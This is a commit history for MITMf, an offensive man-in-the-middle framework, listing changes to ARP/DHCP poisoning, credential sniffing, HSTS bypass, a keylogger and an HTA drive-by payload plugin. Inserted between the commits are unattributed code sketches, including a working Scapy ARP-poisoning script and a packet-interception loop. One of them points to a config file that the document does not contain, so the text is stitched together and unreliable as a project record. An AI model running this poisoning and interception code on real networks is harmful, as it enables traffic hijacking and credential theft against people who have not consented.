Compare commits

...

222 commits

Author SHA1 Message Date
byt3bl33d3r
0458300e58
Update README.md 2018-08-28 23:37:24 +08:00
byt3bl33d3r
ca6ba15ee3
Update README.md 2018-08-28 23:37:00 +08:00
byt3bl33d3r
067cc4e337
Merge pull request #472 from rememberYou/fix/display
Fix indentation for arpmode
2018-05-04 11:19:17 -06:00
byt3bl33d3r
18814dd1a0
Merge pull request #473 from rememberYou/fix/alias-banner
Fix useless banner alias
2018-05-04 11:19:08 -06:00
byt3bl33d3r
0c844045cb
Merge pull request #474 from rememberYou/fix/file-reading
Add refactoring of file reading
2018-05-04 11:18:59 -06:00
Terencio Agozzino
2f802e71c7 Add refactoring of file reading 2018-05-03 20:28:54 +02:00
Terencio Agozzino
ab5a969e23 Fix useless banner alias 2018-05-03 19:56:31 +02:00
Terencio Agozzino
e44551bd54 Fix indentation for arpmode 2018-05-03 19:51:57 +02:00
byt3bl33d3r
906c7951df
Merge pull request #279 from oscar1/master
possible fix for issues #253 and #227
2018-03-27 01:59:47 +08:00
byt3bl33d3r
6407b1df9f
Merge pull request #416 from jlcmoore/master
Https load error, and incorrect variable name
2018-03-27 01:59:35 +08:00
byt3bl33d3r
8588921e09
Merge pull request #450 from sensepost/master
Netcreds update, fixing some versions of the CHALLENGE NOT FOUND bug.
2018-03-27 01:59:18 +08:00
Reino Mostert
9c4313c0eb This commit includes various fixes made to netcreds over the past two years. Most notably, it fixes the issue in which parse_netntlm_chal passes arguments to parse_ntlm_chal in the wrong order, and the issue in which headers_to_dict does not parse HTTP headers correctly, which caused the CHALLENGE NOT FOUND bug. This resolves https://github.com/byt3bl33d3r/MITMf/issues/436. The output format changes in netcreds have been left out of this commit. 2018-02-19 18:01:36 +02:00
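headers_to_dict is the Net-Creds helper named in the commit above. The real fix is not reproduced in this view; the snippet below is only a hypothetical, standalone illustration of what parsing a raw HTTP header block into a dict looks like.

```python
# Hypothetical sketch only, not Net-Creds' actual headers_to_dict().
def headers_to_dict(raw_headers):
    """Turn a raw HTTP header block into a {lowercase-name: value} dict."""
    headers = {}
    for line in raw_headers.split("\r\n"):
        if ": " not in line:
            continue  # skip the status/request line and blank lines
        name, _, value = line.partition(": ")
        headers[name.strip().lower()] = value.strip()
    return headers

print(headers_to_dict("HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: NTLM TlRMTVNTUAAC\r\n\r\n"))
# {'www-authenticate': 'NTLM TlRMTVNTUAAC'}
```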
byt3bl33d3r
ba0989b677
Update README.md 2017-12-20 17:46:29 -07:00
byt3bl33d3r
da0c7356fe Merge pull request #425 from OmgImAlexis/master
fix header markdown
2017-10-18 10:28:56 -06:00
Alexis Tyler
aa11f2a12b
fix header markdown 2017-10-16 19:57:34 +10:30
Jared Moore
c8db6d3568 Https load error, and incorrect variable name 2017-08-07 09:57:56 -05:00
byt3bl33d3r
d535950994 Merge pull request #397 from Ritiek/master
Fix typo
2017-05-01 09:41:11 -06:00
byt3bl33d3r
5bf3e29e01 Update README.md 2017-04-30 23:56:19 -06:00
Ritiek Malhotra
182b3d704b Fix typo 2017-05-01 07:42:57 +05:30
byt3bl33d3r
13d469d979 Merge pull request #394 from camilleeyries/patch-1
Notice user when not running as root.
2017-04-28 11:47:06 -06:00
Camille Eyriès
acff5e6e44 Notice user when not running as root.
The mocking message that was at this place before was... hurting.
Fixed. (maybe it's a design principle, I don't know)

Example output: ```
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[-] The derp is strong with this one
TIP: you may run MITMf as root.
```
2017-04-28 18:47:26 +02:00
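The patch itself is not shown in this view; a rough, hypothetical sketch of the kind of root check described (POSIX-only, reusing the tip text from the example output above):

```python
import os
import sys

# Hypothetical sketch, not the actual MITMf patch. os.geteuid() is POSIX-only.
if os.geteuid() != 0:
    sys.exit("TIP: you may run MITMf as root.")
```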
byt3bl33d3r
431e0a78ec Merge pull request #389 from bryant1410/master
Fix broken headings in Markdown files
2017-04-18 20:36:53 -06:00
byt3bl33d3r
b04112ce07 Merge pull request #385 from gigawhitlocks/gigawhitlocks-patch-1
Fix misspelling in README
2017-04-18 20:36:34 -06:00
Santiago Castro
24d8722db3 Fix broken Markdown headings 2017-04-17 05:25:20 -03:00
Ian Whitlock
0684f7c156 Fix misspelling in README 2017-03-31 10:49:40 -05:00
byt3bl33d3r
0e81e40388 Merge pull request #254 from onedv/master
Captive portal redirecting using 302
2016-12-12 23:39:55 -07:00
byt3bl33d3r
40a5527358 Merge pull request #356 from hackereg35/patch-2
Update packetfilter.py
2016-12-12 23:36:32 -07:00
byt3bl33d3r
0c8c555158 Merge pull request #357 from hackereg35/patch-3
Update mitmf.py
2016-12-12 23:36:23 -07:00
byt3bl33d3r
e8dd557592 Merge pull request #346 from ZonkSec/master
spelling correction on "Zapped a strict-trasport-security header"
2016-12-12 23:18:45 -07:00
hackereg35
726c823628 Update mitmf.py
Added multi filter support
2016-11-03 15:55:13 +02:00
hackereg35
37937f74ba Update packetfilter.py
Added multi filter support
2016-11-03 15:49:06 +02:00
ZonkSec
f04ccf9d31 Update ServerConnection.py 2016-10-11 12:17:33 -05:00
ZonkSec
6e9d9ba707 Update ServerConnection.py 2016-10-11 12:16:27 -05:00
byt3bl33d3r
2dc1dd4f12 Hold on to your butts cause here we go.
This should resolve:
* Issue #307
* Issue #309
* Issue #302
* Issue #294

Apparently, Twisted made some fairly heavy API changes in their 16.x
release which kinda fucked all the plugins up.
2016-06-08 23:39:58 -06:00
oscar1
18c8f9119c Merge pull request #1 from oscar1/oscar1-patch-1
Update ARP.py
2016-03-06 15:50:40 +01:00
oscar1
d59b282fb9 Update ARP.py
Small change to fix the "half duplex" issue. First, without the fix I don't receive any packets from the remote host to the target; I only received packets from the target to the remote host. Second, the original code wasn't "symmetric". Tested on Kali 2 with a Linksys WRT54GL router on WiFi. Compared the ARP packets to those produced by ettercap, which was working correctly on my system. With the fix included, the behaviour resembles the ettercap method. It also works correctly when the arguments to the Ether() constructor are removed altogether.

Note that the problem occurs when not using any modules at all, only a simple filter and the spoof plugin. The problem may also be router-specific, I don't know.
2016-03-06 15:48:40 +01:00
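Both this commit and the "fixes #178" commit further down describe building ARP replies with an explicit Ether() layer and sending them at layer 2 with Scapy. A standalone sketch of that symmetric poisoning follows; all addresses are made-up examples and this is not MITMf's ARP.py.

```python
from scapy.all import ARP, Ether, sendp

# Example addresses only.
attacker_mac = "aa:bb:cc:dd:ee:ff"
target_ip, target_mac = "192.168.1.10", "11:22:33:44:55:66"
gateway_ip, gateway_mac = "192.168.1.1", "77:88:99:aa:bb:cc"

# Symmetric poisoning: tell the target that the gateway's IP is at our MAC ...
to_target = Ether(src=attacker_mac, dst=target_mac) / ARP(
    op=2, psrc=gateway_ip, hwsrc=attacker_mac, pdst=target_ip, hwdst=target_mac)
# ... and tell the gateway that the target's IP is at our MAC.
to_gateway = Ether(src=attacker_mac, dst=gateway_mac) / ARP(
    op=2, psrc=target_ip, hwsrc=attacker_mac, pdst=gateway_ip, hwdst=gateway_mac)

# sendp() transmits at layer 2, so the hand-built Ether() header is used as-is.
sendp([to_target, to_gateway], iface="eth0", verbose=False)
```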
byt3bl33d3r
06ef1da084 Merge pull request #259 from HAMIDx9/master
Multiple fixes, netcreds, hsts dns, inject plugin
2016-01-30 11:51:09 -07:00
HAMIDx9
96e0b5f0e0 Fix #230 HSTS bypass DNS problem when timeout occurs 2016-01-29 01:43:45 +03:30
HAMIDx9
f8293c38c9 Fix returning data; check the MIME type to avoid the heavy chardet process, since we are not interested in other MIME types. 2016-01-29 01:42:54 +03:30
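A minimal sketch of the optimization this commit describes, only running chardet on MIME types worth decoding; the function name and the MIME whitelist are illustrative, not the plugin's actual code.

```python
import chardet  # character-encoding detection, relatively expensive on large bodies

def decode_if_interesting(body, content_type):
    """Only run chardet on MIME types we actually care about (body is bytes)."""
    if not content_type or not content_type.lower().startswith(("text/", "application/xhtml")):
        return None  # other MIME types: skip detection entirely
    guess = chardet.detect(body)
    return body.decode(guess["encoding"] or "utf-8", errors="replace")
```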
HAMIDx9
2490b87f43 Fix printer format to print logs and avoid netcreds shutting down 2016-01-28 22:03:07 +03:30
Oliver Nettinger
822b87e77c Captive Portal related changes
Made options exclusive
Added OSX files to .gitignore
Update README with plugin
2016-01-19 07:52:23 +01:00
Oliver Nettinger
681be498a9 Added captive portal plugin 2016-01-14 11:11:21 +01:00
byt3bl33d3r
d542dc139f Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-11-03 17:57:47 -07:00
byt3bl33d3r
640f02a8a3 Added imagerandomizer plugin 2015-11-03 17:57:41 -07:00
byt3bl33d3r
5a6e0f6f48 Merge pull request #204 from xmcp/xmcp-patch-1
fixes #201
2015-10-22 12:31:51 -06:00
byt3bl33d3r
d0b4fd66fa Merge pull request #207 from orthographic-pedant/spell_check/arbitrary
Fixed typographical error, changed arbitary to arbitrary in README.
2015-09-30 19:50:14 -05:00
orthographic-pedant
ba280cc64c Fixed typographical error, changed arbitary to arbitrary in README. 2015-09-30 18:51:40 -04:00
xiao-mou
f7396d631d bugfix 2015-09-28 21:22:10 +08:00
byt3bl33d3r
f6ffad2879 Merge pull request #193 from xmcp/xmcp-patch-1
fixes #192
2015-09-14 20:27:21 +02:00
byt3bl33d3r
589e45b64f Fixed IPtables for APF Mode
Added a new banner
2015-09-14 20:25:24 +02:00
xiao-mou
b04d2e0258 bugfix 2015-09-10 17:20:15 +08:00
byt3bl33d3r
16b774248d updated bdfactory to latest commit 2015-09-06 13:52:32 +02:00
byt3bl33d3r
5b7967f02d removed setup.sh 2015-09-06 13:28:24 +02:00
byt3bl33d3r
d1df76c601 fixes #188 2015-09-06 13:14:12 +02:00
byt3bl33d3r
22a43df4f8 DNS server now outputs all queries to a separate log file
Fixed a bug where the SSLStrip proxy wouldn't allow caching if the AppCache poison plugin is enabled
HTTP and SMB servers now listen on all interfaces
2015-09-06 12:47:07 +02:00
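Giving one component its own log file is plain standard-library logging; a sketch of roughly what "outputs all queries to a separate log file" implies (logger name and path are examples, not MITMf's actual setup):

```python
import logging

dns_log = logging.getLogger("mitmf.dns")           # example logger name
handler = logging.FileHandler("dns-queries.log")   # example path
handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
dns_log.addHandler(handler)
dns_log.setLevel(logging.INFO)

dns_log.info("A query for example.com from 192.168.1.10")
```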
byt3bl33d3r
9add87c5b2 Fixed a bug where the DNS server would throw a traceback when multiple nameservers are specified 2015-09-06 11:23:45 +02:00
byt3bl33d3r
a0fecd4a38 reverts changes from PR #183, fixes issue #187 2015-09-06 10:51:40 +02:00
byt3bl33d3r
bb3078ca40 added an actual .coveragerc for coverage 2015-09-05 15:41:32 +02:00
byt3bl33d3r
f7da7926df added coveralls support in travis 2015-09-05 15:19:46 +02:00
byt3bl33d3r
2042e8350d Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-09-05 14:57:15 +02:00
byt3bl33d3r
96c83ee565 added coveralls badge to the readme 2015-09-05 14:56:44 +02:00
byt3bl33d3r
c870d80d04 Merge pull request #183 from HAMIDx9/master
Fix improper use of multiple nameservers from the config
2015-09-05 14:45:33 +02:00
byt3bl33d3r
3fb6f21153 travis now uses notices instead of messages 2015-09-05 14:40:52 +02:00
byt3bl33d3r
333234a445 add skip_join to travis 2015-09-05 14:35:40 +02:00
byt3bl33d3r
c0934e1179 travis is picky 2015-09-05 14:25:33 +02:00
byt3bl33d3r
766e5b7a44 changed default IRC message template 2015-09-05 14:20:12 +02:00
byt3bl33d3r
650525ef12 added IRC notifications for travis 2015-09-05 13:56:01 +02:00
byt3bl33d3r
7512c51af5 updated .travis.yml for faster tests 2015-09-05 13:46:16 +02:00
HAMIDx9
00745afb35 Fix improper use of multiple nameservers from the config 2015-09-03 11:50:02 +04:30
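The config file further down documents the nameserver format (e.g. 8.8.8.8#53 or 4.2.2.1#53#tcp, comma separated). A hypothetical parser for that format, shown for illustration only and not the actual fix:

```python
def parse_nameservers(value):
    """Parse '8.8.8.8,4.2.2.1#53#tcp' into (host, port, proto) tuples."""
    servers = []
    for entry in str(value).split(","):
        parts = entry.strip().split("#")
        host = parts[0]
        port = int(parts[1]) if len(parts) > 1 else 53
        proto = parts[2] if len(parts) > 2 else "udp"
        servers.append((host, port, proto))
    return servers

print(parse_nameservers("8.8.8.8,4.2.2.1#53#tcp"))
# [('8.8.8.8', 53, 'udp'), ('4.2.2.1', 53, 'tcp')]
```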
byt3bl33d3r
df608030f3 fixes #178, we are now manually adding an Ether() layer to ARP packets and sending them at L2 2015-09-02 14:47:25 +02:00
byt3bl33d3r
e54b90aa7b fixes #182, iptables rules weren't being set 2015-09-02 12:02:56 +02:00
byt3bl33d3r
54c27ddade fixed Net-Creds tests 2015-09-01 14:31:12 +02:00
byt3bl33d3r
986b2b851f Fixed bug where Net-Creds wouldn't parse URLs and HTTP data when reading from a pcap
Active packet filtering engine and proxy + servers are now mutually exclusive, you can only start one of them (iptables conflicts)
2015-09-01 14:15:21 +02:00
byt3bl33d3r
28fc081068 Merge pull request #169 from HAMIDx9/master
Add unicode support for jskeylogger plugin, fixes #56
2015-08-24 05:35:52 +02:00
HAMIDx9
752fafaf4b Add unicode support for jskeylogger plugin, fixes #56 2015-08-24 04:52:33 +04:30
byt3bl33d3r
05588febef not worth testing utils.py, removed from tests 2015-08-23 22:11:10 +02:00
byt3bl33d3r
ac762ad810 now this should work 2015-08-23 22:05:10 +02:00
byt3bl33d3r
6bde387356 changed interface in tests 2015-08-23 21:59:42 +02:00
byt3bl33d3r
9d774a28b9 travis is trolling me again 2015-08-23 21:51:32 +02:00
byt3bl33d3r
c0aa986b77 travis is trolling me 2015-08-23 21:45:04 +02:00
byt3bl33d3r
1a14f85ed3 added moar tests! 2015-08-23 21:37:40 +02:00
byt3bl33d3r
bef63eda9f now using nosetests 2015-08-23 21:08:33 +02:00
byt3bl33d3r
a3bbc797ac removed system_site from travis 2015-08-23 21:03:05 +02:00
byt3bl33d3r
db5b65c463 trying some new tests out 2015-08-23 20:11:27 +02:00
byt3bl33d3r
27c28e512e Inject.py now tries to detect encoding before parsing HTML with BeautifulSoup 2015-08-23 19:42:52 +02:00
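chardet, BeautifulSoup and lxml are all named in the neighbouring commits and requirements; a standalone sketch of detecting the encoding before parsing, not the Inject plugin's actual code:

```python
import chardet
from bs4 import BeautifulSoup

def parse_html(raw_bytes):
    # Detect the encoding ourselves instead of letting BeautifulSoup guess.
    encoding = chardet.detect(raw_bytes)["encoding"] or "utf-8"
    return BeautifulSoup(raw_bytes, "lxml", from_encoding=encoding)

soup = parse_html(b"<html><body><h1>hello</h1></body></html>")
print(soup.h1.text)  # hello
```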
byt3bl33d3r
fb41a510f6 Merge branch 'master' of https://github.com/HAMIDx9/MITMf into HAMIDx9-master 2015-08-23 18:48:22 +02:00
byt3bl33d3r
cbcf44b360 added lxml to requirements.txt 2015-08-23 18:48:19 +02:00
HAMIDx9
7a5186750f Fix encoding in Inject plugin by using manual encoding detection, BS fails in some cases 2015-08-23 20:57:18 +04:30
byt3bl33d3r
24070afbd0 Removed the beefautorun plugin since it's pretty useless now with BeEF's ARE engine
removed check to enable IP forwarding using sysctl
2015-08-23 01:33:16 +02:00
byt3bl33d3r
77fc00539e Merge branch 'master' into watchdog_removal 2015-08-23 01:28:14 +02:00
byt3bl33d3r
28cf6bb687 Update README.md 2015-08-23 01:25:40 +02:00
byt3bl33d3r
69630e7a51 Merge branch 'master' into watchdog_removal 2015-08-22 22:24:12 +02:00
byt3bl33d3r
69f3e65ea9 Update CONTRIBUTING.md 2015-08-22 22:19:10 +02:00
byt3bl33d3r
09402ecccf Update README.md 2015-08-22 22:08:10 +02:00
byt3bl33d3r
20ae6b204b added system_site_packages in travis.yml 2015-08-22 17:07:20 +02:00
byt3bl33d3r
885ecc3a4e replaced watchdog with pyinotify 2015-08-22 16:51:50 +02:00
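A hedged sketch of what a pyinotify-based config watcher can look like; the path and handler below are illustrative and this is not the project's configwatcher.py.

```python
import pyinotify

CONFIG_PATH = "config/mitmf.conf"  # example path

class ConfigHandler(pyinotify.ProcessEvent):
    def process_IN_MODIFY(self, event):
        print("[*] {} changed, reloading settings".format(event.pathname))
        # re-read the file here and push the new values to plugins/servers

wm = pyinotify.WatchManager()
notifier = pyinotify.ThreadedNotifier(wm, ConfigHandler())
notifier.start()                                   # watch in a background thread
wm.add_watch(CONFIG_PATH, pyinotify.IN_MODIFY)
# call notifier.stop() on shutdown
```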
byt3bl33d3r
d535c8796c fixes #158 2015-08-12 17:51:55 +02:00
byt3bl33d3r
1a5c7c03b7 Updated Filepwn plugin to the latest BDFactory & BDFProxy version 2015-08-12 16:30:34 +02:00
byt3bl33d3r
1a50f000c1 added an option to parse creds from a pcap using NetCreds, removed mitmflib as a dep (was causing problems for travis) 2015-08-11 17:11:44 +02:00
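Offline credential parsing boils down to iterating a capture file; a rough illustration with Scapy (not Net-Creds itself, and the capture path and keyword check are examples):

```python
from scapy.all import rdpcap, TCP, Raw

for pkt in rdpcap("capture.pcap"):                # example capture file
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        # Very naive: flag cleartext FTP/POP-style logins.
        if payload.startswith((b"USER ", b"PASS ")):
            print(pkt[TCP].dport, payload.strip())
```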
byt3bl33d3r
0a00f671b8 removed capstone dep in .travis.yml 2015-08-11 16:31:28 +02:00
byt3bl33d3r
56cb34568d added capstone to build deps, added msg param in basic_tests.py 2015-08-11 16:25:00 +02:00
byt3bl33d3r
a44cf5cd29 doing some testing with tests 2015-08-11 16:10:12 +02:00
byt3bl33d3r
3d9e2ac453 re-added sudo to travis.yml (I have no idea what I'm doing) 2015-08-11 16:01:59 +02:00
byt3bl33d3r
1dd8feeea0 got rid of sudo in tests 2015-08-11 15:53:31 +02:00
byt3bl33d3r
7f691244e7 added basic test 2015-08-11 15:48:40 +02:00
byt3bl33d3r
81c3400383 added .travis.yml 2015-08-11 15:25:24 +02:00
byt3bl33d3r
89a1f9f9af added travis-ci badge 2015-08-05 15:10:15 +02:00
byt3bl33d3r
e22276477b fixes #150
Forgot to start up the Browser server.. oops!
2015-08-05 14:32:22 +02:00
byt3bl33d3r
772ef9ab39 responder code is now up to date with the latest version
logging is going to have to get cleaned up, but that's a minor issue
re-implemented the function to add endpoints to the http server
added an option to manually specify the gateway's MAC in the Spoofer plugin
2015-08-05 13:31:04 +02:00
byt3bl33d3r
c527dc1d21 debug logs now show command string used on startup 2015-08-03 05:46:00 +02:00
byt3bl33d3r
0aba2ad62c Merge branch 'responder-refactor' of github.com:byt3bl33d3r/MITMf into responder-refactor 2015-08-03 05:38:44 +02:00
byt3bl33d3r
052c86b242 fixes #146 2015-08-03 05:38:02 +02:00
byt3bl33d3r
159d3adf7a fixes 146 2015-08-03 05:37:23 +02:00
byt3bl33d3r
fa59ca466b third pass:
- All servers back online
- modified logging
2015-08-03 05:34:46 +02:00
byt3bl33d3r
46356b2ad5 Merge branch 'master' of github.com:byt3bl33d3r/MITMf into responder-refactor 2015-08-02 22:53:28 +02:00
byt3bl33d3r
8b55a2e3f5 Second pass:
MDNS, LLMNR and NBTNS poisoners are back online
HTTP server now functional
2015-08-02 22:53:16 +02:00
byt3bl33d3r
703c9045ed Fixes #144 2015-08-02 21:23:35 +02:00
byt3bl33d3r
fd9b79c617 first pass at refactoring:
directory structure has been simplified by grouping all the poisoners and servers in one folder
impacket smb server has been replaced with responder's
flask http server has been replaced with responder's
modified config file to support new changes
2015-08-02 21:15:10 +02:00
byt3bl33d3r
93d21c8b27 Fixed bug when logging in Netcreds
Fixed an invalid function call in MDNSpoisoner.py
2015-08-01 11:12:53 +02:00
byt3bl33d3r
8270f337ad DHCP poisoner now takes into account the requested IP of clients and the WPAD server address
Specifying interface is now optional
2015-07-30 16:56:11 +02:00
byt3bl33d3r
87bca5e7dd Added new beefapi.py , modified beefautorun plugin: now handles hook injection + ARE autoloading 2015-07-30 00:54:59 +02:00
byt3bl33d3r
232e43325d modified install instructions 2015-07-28 19:45:12 +02:00
byt3bl33d3r
e9657c0e07 updated lock icon 2015-07-28 11:46:52 +02:00
byt3bl33d3r
795b98d1c5 changed examples 2015-07-28 06:01:21 +02:00
byt3bl33d3r
39aa7473ad updated filter explanation 2015-07-28 05:47:12 +02:00
byt3bl33d3r
68e98704e2 indent and highlighting 2015-07-28 05:11:15 +02:00
byt3bl33d3r
307303ea58 added packet filter tutorial to README 2015-07-28 05:06:42 +02:00
byt3bl33d3r
a831236538 moved the FAQ to CONTRIBUTING.md 2015-07-28 04:40:40 +02:00
byt3bl33d3r
0046c96806 spelling 2015-07-28 02:27:54 +02:00
byt3bl33d3r
a024987c91 Update README.md 2015-07-28 02:19:11 +02:00
byt3bl33d3r
39e0ae0e88 added features and examples in readme 2015-07-28 04:10:32 +02:00
byt3bl33d3r
720c86470a added code climate, modified readme 2015-07-27 21:54:45 +02:00
byt3bl33d3r
7ec9f7b395 This commit adds active packet filtering/modification to the framework (replicates etterfilter functionality)
by using netfilterqueue; you can pass a filter using the new -F option (will be adding an example later)
additionally removed some deprecated attributes and the --manual-iptables option
2015-07-27 20:44:23 +02:00
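A rough sketch of how such an engine can sit on python-netfilterqueue, assuming traffic has already been diverted with an iptables NFQUEUE rule; the filter-loading details are invented for illustration and this is not MITMf's actual engine.

```python
# Assumes traffic was diverted first, e.g.: iptables -I FORWARD -j NFQUEUE --queue-num 1
from netfilterqueue import NetfilterQueue
from scapy.all import IP

# A user-supplied filter file (like the one passed with -F) that may mutate `packet`.
filter_code = compile(open("filter.py").read(), "filter.py", "exec")

def callback(nfq_packet):
    packet = IP(nfq_packet.get_payload())      # Scapy-compatible view of the packet
    exec(filter_code, {"packet": packet})      # run the filter
    del packet.chksum                          # let Scapy recompute the IP checksum
    nfq_packet.set_payload(bytes(packet))      # write any changes back
    nfq_packet.accept()                        # re-inject the (possibly modified) packet

nfq = NetfilterQueue()
nfq.bind(1, callback)
try:
    nfq.run()
except KeyboardInterrupt:
    nfq.unbind()
```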
byt3bl33d3r
0add358a57 Update README.md 2015-07-26 13:34:37 +02:00
byt3bl33d3r
42499a9e32 Added description to the README 2015-07-26 15:12:24 +02:00
byt3bl33d3r
85a9a95f2d Added Responder to CONTRIBUTORS 2015-07-26 14:17:21 +02:00
byt3bl33d3r
719779542c added latest version tag in README 2015-07-26 14:07:30 +02:00
byt3bl33d3r
f0fce41c88 App-Cache poison and BrowserSniper plugins have been refactored, added supported python version tags in README 2015-07-26 14:03:56 +02:00
byt3bl33d3r
52a493995a added more to CONTRIBUTORS.md 2015-07-25 03:40:20 +02:00
byt3bl33d3r
f4df9971f9 added CHANGELOG.md, CONTRIBUTORS.md and modded README.md 2015-07-25 03:37:45 +02:00
byt3bl33d3r
41d9e42ca9 added CHANGELOG.md, CONTRIBUTORS.md and modded README.md 2015-07-25 03:29:33 +02:00
byt3bl33d3r
ba14ed8687 This commit refactors ARP and DHCP poisoning:
DHCP poisoning now works on Windows, additionally it's been optimized for performance improvements
ARP poisoning has been optimized with an internal cache and some algo improvements

cve-details-parser.py has been added to the utils/ directory to help adding exploits to the BrowserSniper config file

I'm currently working on adding to the filepwn plugin all of the missing options that bdfproxy stand-alone has
2015-07-25 02:49:41 +02:00
byt3bl33d3r
5e2f30fb89 This is a vewwwy big commit
- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as opposed to using regexes
- The logging of the whole framework has been completely overhauled
- plugindetect.js now includes os.js from the metasploit framework for os and browser detection, lets us fingerprint hosts even if UA is lying!
- New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload
- the API of the plugins has been simplified
- Improvements and error handling to user-agent parsing
- Some misc bugfixes
2015-07-18 20:14:07 +02:00
byt3bl33d3r
ff0ada2a39 Revamped logging , plugins will be re-added later once refactored 2015-07-14 17:40:19 +02:00
byt3bl33d3r
fb0e8a3762 fixed #126 2015-06-20 14:16:29 +02:00
byt3bl33d3r
8f27b76ac6 Merged changes from upstream 2015-06-19 12:13:32 +02:00
byt3bl33d3r
7e35d26514 should fix bug number 2 of issue #122 2015-06-19 12:13:18 +02:00
byt3bl33d3r
254d0ab713 Update README.md 2015-06-18 08:53:36 +02:00
byt3bl33d3r
f99080fc4c fixed error in Exception handling in SMBserver.py 2015-06-15 01:04:47 +02:00
byt3bl33d3r
2cde231b55 fixed conflict 2015-06-15 00:28:36 +02:00
byt3bl33d3r
951937bac4 commented out unfinished option in Inject.py 2015-06-15 00:27:09 +02:00
byt3bl33d3r
e25edc21c6 updated readme.md again 2015-06-15 00:21:51 +02:00
byt3bl33d3r
bb8ee46b82 added kali setup script and updated readme 2015-06-15 00:18:55 +02:00
byt3bl33d3r
7fc75d7bf8 changed ServerConnection.py back over to user_agents! 2015-06-12 01:36:12 +02:00
byt3bl33d3r
882e3b6d07 Update requirements.txt 2015-06-12 00:07:50 +02:00
byt3bl33d3r
b73ac99de3 re-added scapy, changed imports 2015-06-11 22:27:31 +02:00
byt3bl33d3r
aa246130e2 updated requirements.txt, changed imports to mitmflib 2015-06-11 22:05:22 +02:00
byt3bl33d3r
5b969e09fb added error handling into ARPWatch, removed a useless (i think) lib from requirements.txt 2015-06-10 19:42:23 +02:00
byt3bl33d3r
e3aa8ba617 fixes #117 2015-06-08 13:38:45 +02:00
byt3bl33d3r
2f9b8ff77a Merged branch webserver into master, the actual built-in webserver isn't ready yet
but the changes to the SMB server are, we can now define shares in the config and start the SMB server in Karma mode! \o/
2015-06-08 04:35:18 +02:00
byt3bl33d3r
96d1078d42 Merge branch 'webserver' 2015-06-08 04:30:11 +02:00
byt3bl33d3r
316246e3cc Re-Wrote Beef-api, refactored the beefAutorun plugin as per #113, this also should address any problems left over from #106 2015-06-08 04:13:55 +02:00
byt3bl33d3r
7110238fb2 This adds in error handling to avoid the 'Interrupted system call' error described in #109
*Note: this doesn't actually fix the problem
2015-06-06 19:26:23 +02:00
byt3bl33d3r
d56ce5447e This commit should resolve issues #106 and #109
Issue #106 was caused by a 'None' value being returned when BeEF was unable to detect the hooked browser's OS

Issue #109 was probably caused by locked resources when send() and sendp() were being called, adding in sleep() seems to have resolved the issue (at least on my machine)
2015-06-06 14:20:54 +02:00
byt3bl33d3r
ffdb4ff55c fixed DHCP and ICMP spoofing calling wrong vars 2015-06-05 21:06:20 +02:00
byt3bl33d3r
b0fa2e010d fixed #108 2015-06-03 01:44:12 +02:00
byt3bl33d3r
b6b40aba2c Resolved Readme.md conflicts 2015-06-02 23:56:02 +02:00
byt3bl33d3r
c2354b9b63 Merged the SMBTrap plugin to master and related code changes 2015-06-02 23:54:33 +02:00
byt3bl33d3r
4de7d3e67e fixed a wrong var 2015-06-02 18:53:30 +02:00
byt3bl33d3r
e1bf7c642a Merge pull request #104 from DrDinosaur/patch-1
Cleaned up readme
2015-06-01 00:56:54 +02:00
Dillon Korman
61d602c5f0 Cleaned up readme
Various improvements with grammar and style.
2015-05-31 12:11:12 -10:00
byt3bl33d3r
14580f1589 second implementation of the HTTP server, you can now define shares for the SMB server in the config file, added an option to switch between the normal SMB server and the Karma version.
removed some useless code (left over from the responder plugin), serverResponseStatus hook now returns a dict (tuple was causing errors)
2015-05-30 15:00:41 +02:00
byt3bl33d3r
87cb98b6ac fixes 98 2015-05-28 13:49:40 +02:00
byt3bl33d3r
f86457b300 fixes #96 2015-05-27 22:02:41 +02:00
byt3bl33d3r
e985d42a8a The new changes caused an exception when unpacking the tuple, fixed it 2015-05-23 00:37:08 +02:00
byt3bl33d3r
840e202e5b handleStatus() is now hooked through serverResponseStatus, we're now able to modify the server response code and message
added the SMBTrap plugin
2015-05-22 20:16:47 +02:00
byt3bl33d3r
e913e6ae75 Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-05-20 14:35:31 +02:00
byt3bl33d3r
8b915064c1 fixed wrong var name in beefautorun 2015-05-20 14:35:03 +02:00
byt3bl33d3r
bdcee18be0 Merge branch 'master' of github.com:byt3bl33d3r/MITMf into webserver 2015-05-19 22:45:27 +02:00
byt3bl33d3r
929520fcc8 Initial webserver implementation, plus organized directory structure a bit better 2015-05-19 22:43:43 +02:00
byt3bl33d3r
a102975492 Update README.md 2015-05-19 22:32:39 +02:00
byt3bl33d3r
fb26d89204 typos 2015-05-19 12:58:58 +02:00
byt3bl33d3r
3814b4cf82 fixed .gitignore 2015-05-19 00:45:27 +02:00
byt3bl33d3r
ae236625db readme 2015-05-19 00:23:03 +02:00
byt3bl33d3r
2249410c9f Merge branch 'master' of github.com:byt3bl33d3r/MITMf
fixed readme conflict
2015-05-19 00:16:09 +02:00
byt3bl33d3r
cd844fcd48 Merge branch 'dynamic_config' 2015-05-19 00:13:27 +02:00
byt3bl33d3r
946ba0b365 updated readme 2015-05-19 00:08:44 +02:00
byt3bl33d3r
563a8d37c1 Fixed a bug in SSLstrip+ code, when redirecting to certain sites
Created a wrapper class around Msfrpc to limit code re-use when interacting with msf
2015-05-19 00:00:40 +02:00
byt3bl33d3r
b9371f7cdc Screenshotter plugin now live!
Added an interval option to specify the interval at which to take the screenshots

